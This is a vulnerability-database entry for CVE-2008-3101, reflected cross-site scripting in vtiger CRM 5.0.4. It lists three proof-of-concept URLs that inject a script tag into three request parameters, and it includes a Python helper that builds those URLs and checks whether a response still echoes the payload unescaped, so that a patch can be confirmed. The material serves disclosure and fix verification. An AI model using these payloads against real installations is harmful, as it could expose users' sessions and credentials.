vtiger CRM Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1115997    Vulnerability type: Cross-site scripting
Published: 2008-09-01    Updated: 2008-09-01
CVE: CVE-2008-3101    CNNVD ID: CNNVD-200809-021
Platform: PHP    CVSS score: 4.3
|Sources
https://www.exploit-db.com/exploits/32307
https://www.securityfocus.com/bid/30951
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-021
|Vulnerability details
vtiger CRM is a web-based open-source customer relationship management system. Several vtiger CRM modules return request parameters to the browser without validating or encoding them, so a remote attacker who gets a victim to follow a crafted authentication or search request can carry out a reflected cross-site scripting attack:
1) When module is set to Users and action to Authenticate, index.php echoes the user_password parameter back to the user without validating it, which can lead to arbitrary HTML and script code being executed in the user's browser session.
2) When module is set to Products and action to index, index.php does not validate the parenttab parameter; when module is set to Home and action to UnifiedSearch, index.php does not validate the query_string parameter. Either case can lead to arbitrary HTML and script code being executed in the user's browser session.
|Exploit
source: http://www.securityfocus.com/bid/30951/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>
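As an added example (not vtiger's code and not part of the BID advisory), the following Python builds the three proof-of-concept URLs above with proper URL encoding and classifies a captured response body as reflecting the payload raw (still vulnerable), entity-escaped (fixed for the attribute context the payload targets), or not at all, so a patched install can be verified. The two sample response bodies are constructed, not captured from a real vtiger instance; the base URL and the assumption that the parameter is echoed into an input's value attribute are illustrative.

```python
"""Reflected-XSS triage for the three vtiger CRM 5.0.4 PoC URLs (CVE-2008-3101).

Added example, not vtiger's code. The response bodies below are constructed
to mimic (a) the advisory's description of 5.0.4 echoing the parameter raw
into a page, and (b) a build that HTML-escapes it before output.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# The three injection points named in the advisory: (module, action, parameter).
INJECTION_POINTS = [
    ("Products", "index", "parenttab"),
    ("Users", "Authenticate", "user_password"),
    ("Home", "UnifiedSearch", "query_string"),
]

# The advisory's payload: closes a double-quoted attribute, then injects a script element.
PAYLOAD = '"><script>alert(1);</script>'

# Constructed sample responses (not captured from a real vtiger install).
# Vulnerable: the parameter lands verbatim inside an input's value attribute,
# so the leading '">' terminates the attribute and the <script> element is parsed.
VULNERABLE_BODY = (
    '<form><input type="hidden" name="parenttab" '
    'value=""><script>alert(1);</script>"></form>'
)
# Patched: the same value after HTML escaping (what htmlspecialchars($v, ENT_QUOTES) emits).
PATCHED_BODY = (
    '<form><input type="hidden" name="parenttab" '
    'value="&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;"></form>'
)


def build_poc_urls(base_url="http://www.example.com/vtigercrm/index.php", payload=PAYLOAD):
    """Return {parameter: url} for each injection point, with the query URL-encoded
    so the payload survives transport intact (the advisory lists it unencoded)."""
    urls = {}
    for module, action, param in INJECTION_POINTS:
        query = urlencode({"module": module, "action": action, param: payload})
        urls[param] = f"{base_url}?{query}"
    return urls


def payload_from_url(url, param):
    """Decode the parameter back out of a PoC URL (sanity check on the encoding)."""
    return parse_qs(urlsplit(url).query)[param][0]


def classify_reflection(body, payload=PAYLOAD):
    """How does `body` reflect `payload`?

    'raw'     : verbatim, so the closing quote and <script> reach the HTML parser (vulnerable)
    'escaped' : only the entity-encoded form is present (fixed for an attribute/text context)
    'absent'  : neither form appears
    This checks the attribute-breakout context the advisory's payload targets; reflection
    inside a <script> string would need a different payload and a different check.
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:  # &quot;&gt;&lt;script&gt;...
        return "escaped"
    return "absent"


def triage(bodies_by_param):
    """Classify one captured response per parameter."""
    return {param: classify_reflection(body) for param, body in bodies_by_param.items()}


def still_vulnerable(bodies_by_param):
    """True if any parameter is still reflected raw."""
    return any(result == "raw" for result in triage(bodies_by_param).values())


if __name__ == "__main__":
    for param, url in build_poc_urls().items():
        print(f"{param}: {url}")
    print(triage({"parenttab": VULNERABLE_BODY, "query_string": PATCHED_BODY}))
```

Run the three URLs against a test instance, save each response body, and feed them to `triage`; a `raw` result for any parameter means the page still emits the value unencoded. An `escaped` result only shows the value is safe in an HTML attribute or text node, which is the context these PoCs exercise.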
|Affected products
vtiger vtiger CRM 5.0.4
|References

Source: BID
Name: 30951
Link: http://www.securityfocus.com/bid/30951
Source: SECUNIA
Name: 31679
Link: http://secunia.com/advisories/31679
Source: XF
Name: vtigercrm-index-xss(44792)
Link: http://xforce.iss.net/xforce/xfdb/44792
Source: MISC
Link: http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1%5Baction%5D=getviewdetailsfordownload&tx_abdownloads_pi1%5Buid%5D=128&tx_abdownloads_pi1%5Bcategory_uid%5D=5&cHash=e16be773a5
Source: BUGTRAQ
Name: 20080901 Multiple Cross Site Scripting (XSS) Vulnerabilities in vtiger CRM 5.0.4, CVE-2008-3101
Link: http://www.securityfocus.com/archive/1/archive/1/495885/100/0/threaded
Source: VUPEN
Name: ADV-2008-2471
Link: http://www.frsirt.com/english/advisories/2008/2471
Source: MISC
Link: http://www.datensalat.eu/~fabian/cve/CVE-2008-3101-vtigerCRM.html
Source: SREASON
Name: 4208
Link: http://securityreason.com/securityalert/4208